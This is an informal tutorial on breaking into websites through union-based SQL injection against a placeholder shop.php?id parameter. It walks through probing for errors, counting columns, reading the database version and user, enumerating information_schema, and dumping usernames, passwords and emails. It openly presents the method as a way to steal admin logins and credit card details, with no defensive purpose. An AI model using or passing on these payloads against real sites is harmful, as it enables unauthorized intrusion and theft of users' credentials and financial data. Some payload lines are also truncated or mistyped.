There are couple ways to Hack Into a Website
1. Sql injection
2. RFI
3. LFI
4. Xss
5. Otherways
well in Sql Injection is the most famous thing so I will teach you about SQL with Pic !
Sql Injection
What is SQL Injection?
SQL Injection is something like. In the very simple way when you inject a Site you can get
Admin User Name (Root)
Admin password (Root)
Other admins pass
Every User Name
Every User Pass
Cridit Card Info ( Every Detail )
How you Find a Site Venurable or not
Lets Say I have a Site
Code:
http://www.website.com/shop.php?id=10
to see it HackAble or not Put ‘ in the End
So it Shoud look like
Code:
http://www.website.com/shop.php?id=10′
And If it Give you a MYSQL Error ..That mean the Site is Hack Able
Ok Next Step is
so Now We Know the Site is Venul or not .
Now We Have get trought This to Hack into admin
1. Finding the number of columns
2. Check if UNION works.
3. Looking for a visible column
3. Check if the version is > 5
4. Extracting table names, column names, etc… (Or bruteforcing if the version is < 5) 5. Forming the finishing query to extract our required information. Finding the number of columns Code: http://www.Site.com/shop.php?id=10+order+by+1– (You shoul not get any error) Code: http://www.Site.com/shop.php?id=10+order+by+10000– (You should get an error) If u get a Error The Next Step is to Get the number of columns Code: http://www.Site.com/shop.php?id=10+order+by+2– http://www.Site.com/shop.php?id=10+order+by+3– http://www.Site.com/shop.php?id=10+order+by+4– http://www.Site.com/shop.php?id=10+order+by+5– http://www.Site.com/shop.php?id=10+order+by+6– http://www.Site.com/shop.php?id=10+order+by+7– <— Keep Injecting until you get an error, for me it’s when order by 7 in my Pic Check if UNION works. So Now we Know Our site has 6 columns so What u sould do now is Put it in a order like Code: http://www.Site.com/shop.php?id=-10+Union+Select+1,2,3,4,5,6– Looking for a visible column Now you should get a see a Number in the screen Some were For me its 2 ( Its highlighted ) Check if the version is > 5
Now We need to check if the version is > 5 (VERY VERY IMPORTANT STEP)
For This , I pick our visible column…in this case it is 2…and we must replace it with “@@version”
For Ex :
Code:
http://www.Site.com/shop.php?id=-10+Union+Select+1,@@version,3,4,5,6–
Now you will Able to see the MYSQL Ver Like this
You should FIRST CHECK IF IT IS GREATER THAN 5, now..
If it is, you can proceed or you HAVE TO GUESS THE TABLE NAMES IF ITS BELOW version 5.
Extracting table names, column names, etc…
now we must Get
1. Database names
2. Table names
3. Column names
DataBase Names :
Now This is the Confusing PartSo Stay with me
Now we are gona get the Database Name and user all together since we know the visible column
Code:
http://www.Site.com/shop.php?id=-10+Union+Select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6–
Many peple get confuse with “concat_ws”It actually means concat with separator and the separator we use should be given in the starting of the syntax.Here I used 0x3a whose equivalent is “:” . The main purpose of using this is getting the output in desired format as we need it to be.(copied)
Now lets see what Are this
Version() :— Version()is use to inject version of the MySql used in the server
User() :- This will Inject registered MySql user in the database.
Database () :- is the DataBase Name
Now That will Give you somthing like This
Grab the Database using Information_schema
Code:
http://www.website.com/shop.php?id=1+UNION+SELECT+1, group_concat(schema_name),3,4,5,6 +from+information_schema.schemata—
What is This
1. +from+information_schema.schemata :- returns the databases on the server
We may get the database name depending on the no of databases present.
Like If you get something like this
Sigma is the DataBase Name
Extracting table names:
Now we know the DataBase Name What we need now is MySql Table Names
I’ve picked the database ‘users’ to extract our table names.
we have to use the database information_schema and the table tables and the column table_name to extract the respective table names.
So It Should be like
Code:
http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4 ,5,6+from+information_schema.tables—
This is give you more than we need .. Like Every Junkin DB.
So We Only need tables for the table users. So Now we go up with
Code:
http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema=’users’—
If it didnt respose you properly Some Times you have Hex the “Users” when “Users”Hex it get “0×7573657273″
So it sould be like
http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema =’0×7573657273′—
Now you sould get a Table Name I’ll take the table USERS for example.
column names:
Now we gona get the Data from the table named “USERS” and we extract various columns from it.
Code:
www.Site.com/shop.php?id=10+UNION+SE … olumn_name),3,4,5,6+from+information_schema.columns+where+table_name=’USERS’–
In that I have change group_concat(table_name) to group_concat(column_name) becourse now we are looking for columns .
column_name extracts all column names present in the table.
And add this to the end of the columns
+from+information_schema.columns+where+table_name= ‘USERS’—
it will show you the columns lets think table are username,password and email.
Code:
http://www.website.com/shop.php?id=10+UNION+SELECT+1,concat_ws(0x3a,username,password,email) ,3,4+from+USERS—
